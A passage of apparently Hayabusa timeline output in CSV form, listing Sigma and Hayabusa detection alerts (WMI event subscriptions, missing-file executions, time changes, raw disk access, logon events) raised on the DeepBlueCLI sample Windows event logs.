File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:45:09.380 
+09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:34:55.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:37:57.755 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 09:53:07.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:07:45.896 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:13:36.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:21:57.052 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:36:35.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:38:16.943 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 
14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:23:49.093 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : 
Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed 
Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 
0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 